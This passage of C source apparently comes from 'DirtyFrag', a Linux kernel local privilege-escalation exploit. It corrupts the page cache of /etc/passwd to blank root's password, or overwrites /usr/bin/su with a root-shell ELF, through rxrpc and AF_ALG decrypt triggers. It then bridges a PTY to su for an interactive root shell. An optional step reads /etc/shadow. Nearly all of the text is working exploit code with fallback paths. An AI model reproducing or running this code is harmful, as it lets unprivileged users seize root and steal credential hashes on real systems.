WARN("K_B search exhausted"); return 2; } /* Same chaining logic for splice C: after splice B, file offsets * 8..13 hold Pb[2..7]; offsets 14..15 still hold the original * bytes Cc[6..7]. */ memcpy(Cc_actual, Pb_out + 2, 6); memcpy(Cc_actual + 6, Cc + 6, 2); LOG("Cc_actual (after splice B) = %02x%02x%02x%02x%02x%02x%02x%02x", Cc_actual[0],Cc_actual[1],Cc_actual[2],Cc_actual[3], Cc_actual[4],Cc_actual[5],Cc_actual[6],Cc_actual[7]); fprintf(stderr, "\n=== STAGE 1c: search K_C (chars 8-15 := \"0:GGGGGG:\") prob ~5.4e-8 ===\n"); if (find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok, Kc, Pc_out, seed_base ^ 0x5a5a5a5a5a5a5a5aULL, "K_C") != 0) { WARN("K_C search exhausted"); return 2; } } fprintf(stderr, "\n[+] Predicted post-corruption %s line 1:\n \"root", target_path); /* chars 4-5 from P_A */ for (int i = 0; i < 2; i++) fputc((Pa_out[i]>=32&&Pa_out[i]<127)?Pa_out[i]:'.', stderr); /* chars 6-7 from P_B */ for (int i = 0; i < 2; i++) fputc((Pb_out[i]>=32&&Pb_out[i]<127)?Pb_out[i]:'.', stderr); /* chars 8-15 from P_C */ for (int i = 0; i < 8; i++) fputc((Pc_out[i]>=32&&Pc_out[i]<127)?Pc_out[i]:'.', stderr); fprintf(stderr, "/root:/bin/bash\"\n"); /* === STAGE 2 — THREE KERNEL TRIGGERS (in order A → B → C) === * Each trigger does a single in-place decrypt at the * indicated /etc/passwd file offset. Last-write-wins on overlapping * bytes determines the final state. */ fprintf(stderr, "\n=== STAGE 2a: kernel trigger A @ off %d (set chars 4-5 \"::\") ===\n", off_a); memcpy(SESSION_KEY, Ka, 8); if (do_one_trigger(rfd_ro, off_a, 8) < 0) { WARN("kernel trigger A failed"); return 3; } fprintf(stderr, "\n=== STAGE 2b: kernel trigger B @ off %d (set chars 6-7 \"0:\") ===\n", off_b); memcpy(SESSION_KEY, Kb, 8); if (do_one_trigger(rfd_ro, off_b, 8) < 0) { WARN("kernel trigger B failed"); return 3; } fprintf(stderr, "\n=== STAGE 2c: kernel trigger C @ off %d (set chars 8-15 \"0:GGGGGG:\") ===\n", off_c); memcpy(SESSION_KEY, Kc, 8); if (do_one_trigger(rfd_ro, off_c, 8) < 0) { WARN("kernel trigger C failed"); return 3; } /* Verify: re-read line 1 of /etc/passwd via mmap. */ fprintf(stderr, "[*] %s line 1 (root entry) AFTER: '", target_path); for (int i = 0; i < 32; i++) { char c = ((const char *)map)[i]; fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr); } fprintf(stderr, "'\n"); /* Sanity-check: chars 4-5 = "::", 6-7 = "0:", 8-9 = "0:", 15 = ':'. */ { const char *m = (const char *)map; int ok = (m[4] == ':' && m[5] == ':' && m[6] == '0' && m[7] == ':' && m[8] == '0' && m[9] == ':' && m[15] == ':'); if (!ok) { WARN("post-trigger sanity check failed — char layout off"); return 4; } } fprintf(stderr, "\n[!!!] HIT — root entry now has empty passwd field, uid=0, " "gid=0, dir=/root, shell=/bin/bash.\n"); /* === STAGE 3 — VERIFY VIA getent passwd root === */ fprintf(stderr, "\n=== STAGE 3: independent verify via `getent passwd root` ===\n"); { int p[2]; if (pipe(p) == 0) { pid_t pid = fork(); if (pid == 0) { close(p[0]); dup2(p[1], 1); dup2(p[1], 2); close(p[1]); execlp("getent", "getent", "passwd", "root", NULL); _exit(127); } close(p[1]); char buf[1024]; ssize_t r = read(p[0], buf, sizeof(buf) - 1); close(p[0]); int wstatus = 0; waitpid(pid, &wstatus, 0); if (r > 0) { buf[r] = 0; fprintf(stderr, "[getent passwd root] %s", buf); } fprintf(stderr, "[+] PRIMITIVE proven: root entry has empty passwd field " "via NSS.\n"); } } /* Honour `--corrupt-only` arg or DIRTYFRAG_CORRUPT_ONLY=1 env so * the chain wrapper can skip the in-process su PTY stage and exec * /usr/bin/su itself. Avoids the flaky posix_openpt bridge. */ { int co_flag = 0; for (int i = 1; i < argc; i++) if (!strcmp(argv[i], "--corrupt-only")) { co_flag = 1; break; } const char *e = getenv("DIRTYFRAG_CORRUPT_ONLY"); if (e && *e == '1') co_flag = 1; if (co_flag) return 0; } /* === STAGE 4 — `su` (target=root, no password input) === * PAM common-auth contains "auth [success=2 default=ignore] * pam_unix.so nullok" — so a target user with empty passwd field * + nullok flag accepts an empty password. We auto-inject a * single newline on the "Password:" prompt and then bridge the * resulting bash to the user's tty. */ fprintf(stderr, "\n=== STAGE 4: spawning interactive root shell via `su` " "(no password input needed) ===\n\n"); fflush(stderr); int master = posix_openpt(O_RDWR | O_NOCTTY); if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) { WARN("posix_openpt: %s", strerror(errno)); return 5; } char *slave_name = ptsname(master); struct winsize ws; if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0) { ioctl(master, TIOCSWINSZ, &ws); } pid_t pid = fork(); if (pid < 0) { WARN("fork: %s", strerror(errno)); return 5; } if (pid == 0) { /* child */ setsid(); int slave = open(slave_name, O_RDWR); if (slave < 0) _exit(127); ioctl(slave, TIOCSCTTY, 0); dup2(slave, 0); dup2(slave, 1); dup2(slave, 2); if (slave > 2) close(slave); close(master); /* `su` with no args targets root. PAM common-auth's pam_unix.so * nullok accepts the empty passwd we planted in /etc/passwd. */ execlp("su", "su", NULL); _exit(127); } /* parent: bridge user's tty <-> master. */ struct termios saved_termios; int saved_termios_ok = (tcgetattr(STDIN_FILENO, &saved_termios) == 0); if (saved_termios_ok) { struct termios raw = saved_termios; cfmakeraw(&raw); tcsetattr(STDIN_FILENO, TCSANOW, &raw); } int auto_pw_sent = 0; int stdin_eof = 0; /* set when stdin closes (e.g. /dev/null) */ char buf[4096]; /* If LPE_AUTO_VERIFY=1 is set, the bridge will inject * `id; whoami; exit\n` so it can prove uid=0 non-interactively * (e.g. when stdin is /dev/null in CI). */ int auto_verify = 0; { const char *e = getenv("LPE_AUTO_VERIFY"); if (e && *e == '1') auto_verify = 1; } int verify_sent = 0; int total_ms = 0; for (;;) { struct pollfd pfds[2] = { { stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 }, { master, POLLIN, 0 }, }; int pr = poll(pfds, 2, 200); if (pr < 0 && errno != EINTR) break; total_ms += 200; if (pfds[1].revents & POLLIN) { ssize_t n = read(master, buf, sizeof(buf)); if (n <= 0) break; (void)write(STDOUT_FILENO, buf, n); if (!auto_pw_sent && (size_t)n < sizeof(buf)) { buf[n] = 0; if (strstr(buf, "Password") || strstr(buf, "password")) { /* Empty password — PAM nullok will accept it. * (When pam_unix sees an empty passwd field plus * nullok it skips the prompt entirely; this branch * handles the case where some other PAM module * prints a prompt anyway.) */ (void)write(master, "\n", 1); auto_pw_sent = 1; } } } if (!stdin_eof && (pfds[0].revents & POLLIN)) { ssize_t n = read(STDIN_FILENO, buf, sizeof(buf)); if (n <= 0) { /* stdin EOF — stop reading from it but keep bridging * master → stdout so su can still finish auth and run * the optional auto-verify command. */ stdin_eof = 1; } else { (void)write(master, buf, n); } } if (pfds[1].revents & (POLLHUP | POLLERR)) break; /* Auto-verify: ~1 s after spawn, send `id; whoami; exit\n` so * the bridge captures uid=0 evidence non-interactively even * when pam_unix's blank-passwd path skips the prompt. */ if (auto_verify && !verify_sent && total_ms >= 1000) { const char cmd[] = "id; whoami; cat /etc/shadow | head -2; exit\n"; (void)write(master, cmd, sizeof(cmd) - 1); verify_sent = 1; } int status; pid_t w = waitpid(pid, &status, WNOHANG); if (w == pid) { for (int i = 0; i < 5; i++) { struct pollfd pf = { master, POLLIN, 0 }; if (poll(&pf, 1, 50) <= 0) break; ssize_t n = read(master, buf, sizeof(buf)); if (n <= 0) break; (void)write(STDOUT_FILENO, buf, n); } break; } } if (saved_termios_ok) { tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios); } close(master); return 0; } /* * DirtyFrag chain — uid=1000 → root. * * 1. ESP path (authencesn AF_ALG --corrupt-only): overwrites the first * 160 bytes of /usr/bin/su's page-cache with a static x86_64 root- * shell ELF. Works on every distro tested regardless of PAM nullok * or /etc/passwd contents — once invoked, the patched setuid-root * /usr/bin/su just execs /bin/sh as uid 0. * * 2. rxrpc path (Ubuntu fallback): if AF_ALG is sandboxed and the ESP * path can't reach the page cache, fall back to the rxrpc/rxkad * nullok primitive that patches /etc/passwd's root entry empty. * PAM nullok then accepts the empty password during `su -`. * * 3. Once either target is corrupted, spawn `/usr/bin/su -` inside a * fresh PTY and bridge the user's tty to it. The bridge handles * both the patched-su (no PAM at all) and the patched-passwd (PAM * nullok) cases uniformly, and works even when the caller is in a * background process group of an ssh-allocated PTY. * */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include extern int su_lpe_main(int argc, char **argv); extern int rxrpc_lpe_main(int argc, char **argv); /* * The 8 bytes our su payload places at file offset 0x78 — the first * instructions of the embedded shell ELF. Sequence: * 31 ff xor edi, edi * 31 f6 xor esi, esi * 31 c0 xor eax, eax * b0 6a mov al, 0x6a (setgid) * Distros' original /usr/bin/su has different bytes here, so this is * a reliable post-patch marker. * * (We don't check offset 0 because /usr/bin/su already has the ELF * magic there — both before and after we patch.) */ static const uint8_t su_marker[8] = { 0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a, }; static int su_already_patched(const char *su_target_path) { int fd = open(su_target_path, O_RDONLY); if (fd < 0) return 0; uint8_t got[8]; ssize_t n = pread(fd, got, sizeof(got), 0x78); close(fd); if (n != sizeof(got)) return 0; return memcmp(got, su_marker, sizeof(su_marker)) == 0; } static int passwd_already_patched(const char *target_path) { int fd = open(target_path, O_RDONLY); if (fd < 0) return 0; char head[16]; ssize_t n = pread(fd, head, sizeof(head), 0); close(fd); if (n < 9) return 0; return memcmp(head, "root::0:0", 9) == 0; } static int either_target_patched(const char *target_path, const char *su_target_path) { return su_already_patched(su_target_path) || passwd_already_patched(target_path); } static void silence_stderr(int *saved_fd) { *saved_fd = dup(STDERR_FILENO); int dn = open("/dev/null", O_WRONLY); if (dn >= 0) { dup2(dn, STDERR_FILENO); close(dn); } } static void restore_stderr(int saved_fd) { if (saved_fd >= 0) { dup2(saved_fd, STDERR_FILENO); close(saved_fd); } } static char **append_corrupt_only(int argc, char **argv, int *new_argc) { static char *flag = "--corrupt-only"; static char *buf[64]; int n = argc < 60 ? argc : 60; for (int i = 0; i < n; i++) buf[i] = argv[i]; buf[n] = flag; buf[n + 1] = NULL; *new_argc = n + 1; return buf; } static void exec_su_login(void) { const char *paths[] = { "/bin/su", "/usr/bin/su", "/sbin/su", "/usr/sbin/su", NULL, }; for (int i = 0; paths[i]; i++) execl(paths[i], "su", "-", (char *)NULL); execlp("su", "su", "-", (char *)NULL); } /* * Spawn `/usr/bin/su -` in a fresh PTY and bridge our tty to it. */ static int run_root_pty(void) { int master = posix_openpt(O_RDWR | O_NOCTTY); if (master < 0) return -1; if (grantpt(master) < 0 || unlockpt(master) < 0) { close(master); return -1; } char *slave_name = ptsname(master); if (!slave_name) { close(master); return -1; } struct winsize ws; if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0) ioctl(master, TIOCSWINSZ, &ws); pid_t pid = fork(); if (pid < 0) { close(master); return -1; } if (pid == 0) { setsid(); int slave = open(slave_name, O_RDWR); if (slave < 0) _exit(127); ioctl(slave, TIOCSCTTY, 0); dup2(slave, 0); dup2(slave, 1); dup2(slave, 2); if (slave > 2) close(slave); close(master); exec_su_login(); _exit(127); } signal(SIGTTOU, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGHUP, SIG_IGN); (void)setpgid(0, 0); (void)tcsetpgrp(STDIN_FILENO, getpid()); struct termios saved_termios; int restore_termios = 0; if (tcgetattr(STDIN_FILENO, &saved_termios) == 0) { struct termios raw = saved_termios; cfmakeraw(&raw); if (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0) restore_termios = 1; } int auto_pw_sent = 0; int stdin_eof = 0; int saw_master_output = 0; int total_ms = 0; char buf[4096]; for (;;) { struct pollfd pfds[2] = { { stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 }, { master, POLLIN, 0 }, }; int pr = poll(pfds, 2, 200); if (pr < 0 && errno != EINTR) break; total_ms += 200; if (pfds[1].revents & POLLIN) { ssize_t n = read(master, buf, sizeof(buf)); if (n <= 0) break; saw_master_output = 1; (void)write(STDOUT_FILENO, buf, n); if (!auto_pw_sent && n < (ssize_t)sizeof(buf)) { buf[n] = 0; if (strstr(buf, "Password") || strstr(buf, "password")) { (void)write(master, "\n", 1); auto_pw_sent = 1; } } } if (!stdin_eof && (pfds[0].revents & POLLIN)) { ssize_t n = read(STDIN_FILENO, buf, sizeof(buf)); if (n <= 0) stdin_eof = 1; else (void)write(master, buf, n); } if (pfds[1].revents & (POLLHUP | POLLERR)) break; if (!auto_pw_sent && !saw_master_output && total_ms >= 1500) { (void)write(master, "\n", 1); auto_pw_sent = 1; } int status; pid_t w = waitpid(pid, &status, WNOHANG); if (w == pid) { for (int i = 0; i < 5; i++) { struct pollfd pf = { master, POLLIN, 0 }; if (poll(&pf, 1, 50) <= 0) break; ssize_t n = read(master, buf, sizeof(buf)); if (n <= 0) break; (void)write(STDOUT_FILENO, buf, n); } break; } } if (restore_termios) tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios); close(master); return 0; } int main(int argc, char **argv) { int verbose = (getenv("DIRTYFRAG_VERBOSE") != NULL); int co_flag = (getenv("DIRTYFRAG_CORRUPT_ONLY") != NULL); int force_esp = 0, force_rxrpc = 0; int saved_err = -1; int rc = 1; int new_argc; char **co_argv; const char *target_path = getenv("POC_TARGET_FILE"); if (!target_path || !*target_path) target_path = "/etc/passwd"; const char *su_target_path = getenv("POC_SU_TARGET_FILE"); if (!su_target_path || !*su_target_path) su_target_path = "/usr/bin/su"; for (int i = 1; i < argc; i++) { if (!strcmp(argv[i], "--force-esp")) force_esp = 1; else if (!strcmp(argv[i], "--force-rxrpc")) force_rxrpc = 1; else if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose")) verbose = 1; } if (getuid() == 0) { execlp("/bin/bash", "bash", (char *)NULL); _exit(1); } co_argv = append_corrupt_only(argc, argv, &new_argc); if (!verbose) silence_stderr(&saved_err); if (force_rxrpc) { rc = rxrpc_lpe_main(new_argc, co_argv); for (int i = 0; !passwd_already_patched(target_path) && i < 3; i++) rc = rxrpc_lpe_main(new_argc, co_argv); } else if (force_esp) { rc = su_lpe_main(new_argc, co_argv); } else { rc = su_lpe_main(new_argc, co_argv); if (!su_already_patched(su_target_path)) { rc = rxrpc_lpe_main(new_argc, co_argv); for (int i = 0; !passwd_already_patched(target_path) && i < 3; i++) rc = rxrpc_lpe_main(new_argc, co_argv); } } int patched = either_target_patched(target_path, su_target_path); if (!verbose) restore_stderr(saved_err); if (patched) { if(!co_flag) { (void)run_root_pty(); } return 0; } dprintf(2, "dirtyfrag: failed (rc=%d)\n", rc); return rc ? rc : 1; }